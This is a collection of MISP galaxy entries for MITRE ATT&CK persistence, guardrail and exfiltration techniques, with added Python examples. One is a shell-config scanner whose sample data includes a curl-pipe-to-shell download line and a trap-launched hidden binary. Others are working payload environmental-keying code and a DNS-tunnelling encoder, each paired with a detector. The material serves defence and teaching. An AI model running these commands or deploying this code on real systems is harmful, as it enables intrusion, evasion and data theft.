PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. [Microsoft About Profiles]

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. [ESET Turla PowerShell May 2019]

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. [Wits End and Shady PowerShell Profiles]

Internal MISP references

UUID 6e65f84b-cfad-49ce-9072-f2966dc02f56 which can be used as unique global reference for PowerShell Profile in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.013
Related clusters

To see the related clusters, click here.

Screensaver

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[Wikipedia Screensaver] The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:

  • SCRNSAVE.exe - set to malicious PE path
  • ScreenSaveActive - set to '1' to enable the screensaver
  • ScreenSaverIsSecure - set to '0' to not require a password to unlock
  • ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.[ESET Gazer Aug 2017]

Internal MISP references

UUID 3f9cd334-0b86-478f-97fa-c3aedd8035d8 which can be used as unique global reference for Screensaver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.002
Related clusters

To see the related clusters, click here.

Trap

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap shell builtin lets scripts and interactive shells specify commands that run when a given signal is received. A common use is a script handling keyboard interrupts such as ctrl+c (SIGINT) so that it can clean up and terminate gracefully.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.[Trap Manual][Cyberciti Trap Statements]

Internal MISP references

UUID 82c07e34-9f67-4f4e-a513-c22a17b508e5 which can be used as unique global reference for Trap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.005
Related clusters

To see the related clusters, click here.

Unix Shell Configuration Modification

Adversaries may establish persistence through executing malicious commands triggered by a user's shell. Unix shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user's home directory (~/) to configure the environment. Bourne-compatible login shells read /etc/profile when initiated. These configuration scripts run with the privileges of the user whose shell is starting (the system-wide files under /etc require root to modify, but they still execute as the logging-in user) and are often used to set environment variables, create aliases, and customize the user's environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into /etc/profile or the scripts under /etc/profile.d.[intezer-kaiji-malware][bencane blog bashrc] These files typically require root permissions to modify and are executed each time a login shell starts for any user on the system. With user-level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile, which are sourced when a user opens a command-line interface or connects remotely.[anomali-rocke-tactics][Linux manual bash invocation] Since bash sources only the first of these files that exists, in that order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged ~/.bashrc, which is additionally executed when a connection is established remotely or another interactive shell is opened, such as a new tab in the terminal.[Tsunami][anomali-rocke-tactics][anomali-linux-rabbit][Magento] Some malware instead triggers on the end of a session: adversaries can use ~/.bash_logout to execute malicious commands when a login shell exits.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.[ScriptingOSX zsh][PersistentJXA_leopitt][code_persistence_zsh][macOS MS office sandbox escape] The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.
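As an added example (not code from the original page or any cited report), the following Python covers both the trap technique above and the shell configuration files described here. It encodes bash's "first existing file wins" rule for login shells and zsh's startup order, and it scans constructed sample file contents (embedded below, not taken from a real host) for lines that register trap handlers, reference world-writable directories, pipe a download into a shell, or background a process. The indicator list and the rule that a trap is only reported alongside another indicator are assumptions chosen to keep ordinary cleanup traps out of the results.

```python
import re
import shlex

# Constructed sample file contents keyed by path (not from a real host).
SAMPLE_FILES = {
    '/etc/profile.d/locale.sh': 'export LANG=en_US.UTF-8\n',
    '/etc/profile': 'trap "echo bye" EXIT\n',
    '/home/alice/.bash_profile': (
        'if [ -f ~/.bashrc ]; then . ~/.bashrc; fi\n'
        '(curl -s http://198.51.100.7/i.sh | sh) &\n'
    ),
    '/home/alice/.bashrc': (
        'alias ll="ls -la"\n'
        'trap "nohup /dev/shm/.x >/dev/null 2>&1 &" EXIT\n'
    ),
    '/home/alice/.zlogout': "trap 'rm -f ~/.zsh_history' INT\nclear\n",
}
WORLD_WRITABLE = ('/tmp/', '/dev/shm/', '/var/tmp/')
DOWNLOAD_PIPE = re.compile(r'\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b')


def bash_login_files(home, existing):
    """Files a bash login shell reads: /etc/profile, then only the FIRST of ~/.bash_profile,
    ~/.bash_login, ~/.profile that exists (bash(1), INVOCATION)."""
    files = ['/etc/profile']
    for name in ('.bash_profile', '.bash_login', '.profile'):
        path = f'{home}/{name}'
        if path in existing:
            files.append(path)
            break
    return files


def zsh_login_files(home):
    """Files an interactive zsh login shell reads, in order; each /etc file precedes the user's."""
    return [p for name in ('zshenv', 'zprofile', 'zshrc', 'zlogin')
            for p in (f'/etc/{name}', f'{home}/.{name}')]


def inspect_line(line):
    """Reasons a line of shell configuration looks like triggered-execution persistence."""
    stripped = line.strip()
    if not stripped or stripped.startswith('#'):
        return []
    try:
        words = shlex.split(stripped, comments=True)
    except ValueError:
        words = stripped.split()
    body, reasons = stripped, []
    if words and words[0] == 'trap' and len(words) >= 3:
        body = words[1]                        # the command list, quotes removed
        reasons.append(f'trap handler registered for {" ".join(words[2:])}')
    if any(d in body for d in WORLD_WRITABLE):
        reasons.append('references a world-writable temp directory')
    if DOWNLOAD_PIPE.search(body):
        reasons.append('downloads and pipes a script into a shell')
    if 'nohup' in body or re.search(r'&\s*$', body):
        reasons.append('backgrounds a process')
    # A trap by itself is ordinary scripting; report it only alongside another indicator.
    trap_only = len(reasons) == 1 and reasons[0].startswith('trap handler')
    return [] if trap_only else reasons


def scan_files(files):
    """(path, line number, line, reasons) for every flagged line across the given files."""
    findings = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            reasons = inspect_line(line)
            if reasons:
                findings.append((path, lineno, line.strip(), reasons))
    return findings


if __name__ == '__main__':
    print(bash_login_files('/home/alice', set(SAMPLE_FILES)))
    for path, lineno, text, reasons in scan_files(SAMPLE_FILES):
        print(f'{path}:{lineno}: {text}\n    ' + '; '.join(reasons))
```

Feeding real files in is a matter of building the dictionary from the paths returned by bash_login_files and zsh_login_files plus ~/.bashrc and ~/.bash_logout; the same line inspector is also a reasonable first pass over installer maintainer scripts (preinst, postinst, postinstall), which share the shell syntax.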

Internal MISP references

UUID cc5ae19f-981d-4004-bb74-260b8ebad73a which can be used as unique global reference for Unix Shell Configuration Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.004
Related clusters

To see the related clusters, click here.

Windows Management Instrumentation Event Subscription

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.[Mandiant M-Trends 2015]

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.[FireEye WMI SANS 2015][FireEye WMI 2015] Adversaries may also write the filter, consumer, and binding as Managed Object Format (MOF) text (.mof extension) and compile it into the WMI repository with mofcomp.exe to create a malicious subscription.[Dell WMI Persistence][Microsoft MOF May 2018]

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe), which typically runs as SYSTEM, so the consumer's payload can execute with SYSTEM privileges.

Internal MISP references

UUID 043ffb62-dacd-4e21-9c86-b31826176283 which can be used as unique global reference for Windows Management Instrumentation Event Subscription in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.003
Related clusters

To see the related clusters, click here.

Event Triggered Execution

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.[Backdooring an AWS account][Varonis Power Automate Data Exfiltration][Microsoft DART Case Report 001]

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.[FireEye WMI 2015][Malware Persistence on OS X][amnesia malware]

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

Internal MISP references

UUID e1e42979-d3cd-461b-afc4-a6373cbf97ba which can be used as unique global reference for Event Triggered Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Environmental Keying

Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.[EK Clueless Agents]

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.[Kaspersky Gauss Whitepaper][Proofpoint Router Malvertising][EK Impeding Malware Analysis][Environmental Keyed HTA][Ebowla: Genetic Malware] By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.[Kaspersky Gauss Whitepaper][Ebowla: Genetic Malware] These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.[Kaspersky Gauss Whitepaper][EK Impeding Malware Analysis][Environmental Keyed HTA][Ebowla: Genetic Malware][Demiguise Guardrail Router Logo] By utilizing target-specific values to decrypt the payload, the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on how the target-specific values are gathered, reverse engineering of the encrypted payload can be exceptionally difficult.[Kaspersky Gauss Whitepaper]

Like other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
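The following Python is an added example of the mechanism described above, not code from the original page or from any of the malware it cites. The operator derives a key from the expected target values (here a constructed domain name and hostname) with PBKDF2 and seals the payload under it; the shipped blob contains salt, nonce, ciphertext, an HMAC tag and the names of the keyed values, but no key. On the target, the same derivation runs over the observed values: a match releases the payload, anything else yields None rather than garbage. The last function shows the analyst's counter-move and the caveat that matters for both sides: because the blob names the values it is keyed on, low-entropy values such as domain names can be recovered offline by guessing. The HMAC-counter keystream stands in for a proper AEAD, which the standard library lacks; the iteration count and sample values are assumptions.

```python
import hashlib
import hmac
import os

# Constructed placeholder for the protected payload.
SAMPLE_PAYLOAD = b'stage2 configuration (constructed placeholder): beacon interval 3600s'
ITERATIONS = 100_000   # assumption: slows offline guessing of low-entropy environment values


def derive_key(env, salt):
    """Key from the sorted target values; only the values, never the key, are needed at runtime."""
    material = '\x00'.join(f'{k}={env[k]}' for k in sorted(env)).encode()
    return hashlib.pbkdf2_hmac('sha256', material, salt, ITERATIONS)


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode; stands in for a proper AEAD, which the stdlib lacks."""
    out, counter = b'', 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, 'big'), 'sha256').digest()
        counter += 1
    return out[:length]


def seal(env, payload):
    """Operator side: encrypt under a key derived from the expected environment. The blob carries
    salt, nonce, ciphertext, tag and the NAMES of the keyed values, but no key material."""
    salt, nonce = os.urandom(16), os.urandom(12)
    key = derive_key(env, salt)
    ct = bytes(a ^ b for a, b in zip(payload, keystream(key, nonce, len(payload))))
    tag = hmac.new(key, salt + nonce + ct, 'sha256').digest()
    return {'salt': salt, 'nonce': nonce, 'ct': ct, 'tag': tag, 'keyed_on': sorted(env)}


def unseal(blob, observed_env):
    """Target side: re-derive the key from what is observed. Wrong environment -> None, not garbage,
    because the tag is checked before anything is decrypted."""
    try:
        env = {k: observed_env[k] for k in blob['keyed_on']}
    except KeyError:
        return None
    key = derive_key(env, blob['salt'])
    expected = hmac.new(key, blob['salt'] + blob['nonce'] + blob['ct'], 'sha256').digest()
    if not hmac.compare_digest(expected, blob['tag']):
        return None
    return bytes(a ^ b for a, b in zip(blob['ct'], keystream(key, blob['nonce'], len(blob['ct']))))


def recover_by_guessing(blob, candidate_envs):
    """Analyst side: the blob names which values it is keyed on, so guessable values (domain names,
    hostnames) can be tried offline. Values with real entropy (a serial number, a file hash) cannot."""
    for env in candidate_envs:
        payload = unseal(blob, env)
        if payload is not None:
            return payload
    return None


if __name__ == '__main__':
    target = {'domain': 'corp.example', 'hostname': 'FIN-WS07'}      # constructed target values
    blob = seal(target, SAMPLE_PAYLOAD)
    print('on target :', unseal(blob, target))
    print('in sandbox:', unseal(blob, {'domain': 'WORKGROUP', 'hostname': 'SANDBOX-PC'}))
    guesses = [{'domain': d, 'hostname': 'FIN-WS07'} for d in ('example.local', 'corp.example')]
    print('analyst   :', recover_by_guessing(blob, guesses))
```

In an incident, the useful output of this model is the set of value names in the blob: they tell the responder which artefacts (domain, hostname, file paths, IP ranges) to collect from the suspected victim so the payload can be decrypted for analysis without the operator's cooperation.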

Internal MISP references

UUID ac10844f-e4ab-44a2-97b4-3d74a1fc046c which can be used as unique global reference for Environmental Keying in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1480.001
Related clusters

To see the related clusters, click here.

Execution Guardrails

Adversaries may use execution guardrails to constrain execution or actions based on adversary-supplied and environment-specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary's campaign.[FireEye Kevin Mandia Guardrails] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[FireEye Outlook Dec 2019]

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

Internal MISP references

UUID aca9cbac-5c11-4050-8d9c-2a947c89a1e8 which can be used as unique global reference for Execution Guardrails in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys in which data encrypted with one key of the pair can only be decrypted with the other. Each end of the communication channel requires its own private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

Internal MISP references

UUID b27b273b-77e7-4243-8b48-a735857c0708 which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.002
Related clusters

To see the related clusters, click here.

Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often switch to symmetric encryption once keys are exchanged, but adversaries may opt to share keys manually and implement symmetric algorithms (ex: RC4, AES) themselves instead of using the mechanisms baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted, such as HTTPS) or encryption in protocols that are not typically encrypted (such as HTTP or FTP).

Internal MISP references

UUID 848e3552-e89d-4981-a5a5-eaf610e6eb37 which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Unencrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.[copy_cmd_cisco]

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
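As an added example of embedding encoded data in a protocol's fields (not code from the original page or from any cited tool), the following Python does both halves of the DNS case: it splits a blob into base32 subdomain labels that respect the 63-byte label and 253-byte name limits, reassembles it from the queries, and then runs a simple detector over a constructed query log to show what the traffic looks like from the defender's side. The log format, the inputs (a deterministic SHA-256 chain standing in for a compressed archive) and the detection thresholds are all assumptions.

```python
import base64
import hashlib
import math
from collections import defaultdict

MAX_LABEL = 63     # RFC 1035 limits
MAX_NAME = 253


def chunk_into_queries(data, zone, seq_width=4):
    """Base32-encode data and split it into names <seq>.<label>.<label>...<zone> that respect
    the label and total-name limits. Returns the names in sequence order."""
    b32 = base64.b32encode(data).decode().rstrip('=').lower()
    budget = MAX_NAME - len(zone) - 1 - (seq_width + 1)     # room left for data labels and dots
    per_query = (budget // (MAX_LABEL + 1)) * MAX_LABEL
    if per_query <= 0:
        raise ValueError('zone too long to carry any data')
    names = []
    for i in range(0, len(b32), per_query):
        piece = b32[i:i + per_query]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        names.append(f'{len(names):0{seq_width}x}.' + '.'.join(labels) + f'.{zone}')
    return names


def reassemble(names, zone):
    """Inverse of chunk_into_queries; the sequence label tolerates out-of-order delivery."""
    ordered = sorted(names, key=lambda n: int(n.split('.', 1)[0], 16))
    b32 = ''.join(n[:-len(zone) - 1].split('.', 1)[1].replace('.', '') for n in ordered).upper()
    return base64.b32decode(b32 + '=' * (-len(b32) % 8))


def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def flag_dns_exfil(query_log, zone_depth=2, min_queries=5, min_avg_len=40, min_entropy=3.5):
    """Group queries by zone and flag zones receiving many long, high-entropy subdomains.
    Thresholds are assumptions to be tuned against the monitored network's baseline."""
    by_zone = defaultdict(list)
    for line in query_log:
        qname = line.split()[2].rstrip('.')      # constructed format: <ts> <client> <qname> <qtype>
        labels = qname.split('.')
        by_zone['.'.join(labels[-zone_depth:])].append('.'.join(labels[:-zone_depth]))
    flagged = {}
    for zone, subs in by_zone.items():
        if len(subs) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.replace('.', '')) for s in subs) / len(subs)
        if avg_len >= min_avg_len and avg_ent >= min_entropy:
            flagged[zone] = {'queries': len(subs), 'avg_len': round(avg_len, 1), 'avg_entropy': round(avg_ent, 2)}
    return flagged


# Constructed inputs: a deterministic high-entropy blob standing in for a compressed archive,
# plus a query log mixing ordinary lookups with the exfiltration queries.
SAMPLE_PAYLOAD = b''.join(hashlib.sha256(bytes([i])).digest() for i in range(20))
BENIGN = ['www.example.com', 'mail.example.com', 'login.example.com',
          'cdn.example.com', 'api.example.com', 'static.example.com']
SAMPLE_LOG = ([f'2024-05-01T10:00:{i:02d} 10.0.0.5 {q} A' for i, q in enumerate(BENIGN)] +
              [f'2024-05-01T10:01:{i:02d} 10.0.0.5 {q} TXT'
               for i, q in enumerate(chunk_into_queries(SAMPLE_PAYLOAD, 'ex.test'))])

if __name__ == '__main__':
    print(len(chunk_into_queries(SAMPLE_PAYLOAD, 'ex.test')), 'queries for', len(SAMPLE_PAYLOAD), 'bytes')
    print(flag_dns_exfil(SAMPLE_LOG))
```

The benign zone receives as many queries as the exfiltration zone, which is why the detector keys on length and entropy rather than volume alone; conversely, an adversary who sends short, low-rate, dictionary-word labels will slip under these thresholds, so the length and entropy cut-offs should be set from the resolver's actual baseline rather than taken from this example.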

Internal MISP references

UUID 27041aa4-13e7-4d84-b1c7-02047beb5534 which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.003
Related clusters

To see the related clusters, click here.

Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.[Palo Alto OilRig Oct 2016] On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.[20 macOS Common Tools and Techniques]

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or Cloud API.

Internal MISP references

UUID 192d25ea-bae1-48e4-88de-e0acd481ab88 which can be used as unique global reference for Exfiltration Over Alternative Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over C2 Channel

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

Internal MISP references

UUID 89203cae-d3f1-4eef-9b5a-29042eb05d19 which can be used as unique global reference for Exfiltration Over C2 Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Bluetooth

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID 38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9 which can be used as unique global reference for Exfiltration Over Bluetooth in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1011.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Other Network Medium

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID d8541e2d-6bdd-4ec0-95c4-c0f657502d5f which can be used as unique global reference for Exfiltration Over Other Network Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration over USB

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Internal MISP references

UUID f424dade-21f3-4269-9940-ce64d93b97c4 which can be used as unique global reference for Exfiltration over USB in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1052.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Physical Medium

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Internal MISP references

UUID 36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f which can be used as unique global reference for Exfiltration Over Physical Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Webhook

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.[RedHat Webhooks] Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.[Discord Intro to Webhooks] When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data.[Push Security SaaS Attacks Repository Webhooks] Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.[Microsoft SQL Server]

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.[CyberArk Labs Discord][Talos Discord Webhook Abuse][Checkmarx Webhooks]

Internal MISP references

UUID 4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca which can be used as unique global reference for Exfiltration Over Webhook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.004
Related clusters

To see the related clusters, click here.

Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow data to be stored, edited, and retrieved from a remote server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Internal MISP references

UUID ce886c55-17ab-4c1c-90dc-3aa93e69bdb4 which can be used as unique global reference for Exfiltration to Cloud Storage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.002
Related clusters

To see the related clusters, click here.

Exfiltration to Code Repository

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

Internal MISP references

UUID c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1 which can be used as unique global reference for Exfiltration to Code Repository in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.001
Related clusters

To see the related clusters, click here.

Exfiltration to Text Storage Sites

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.[Pastebin EchoSec]

Note: This is distinct from Exfiltration to Code Repository, which highlights access to code repositories via APIs.

Internal MISP references

UUID 8b6743e7-e856-5772-8b38-2c002602b365 which can be used as unique global reference for Exfiltration to Text Storage Sites in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.003
Related clusters

To see the related clusters, click here.

Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.
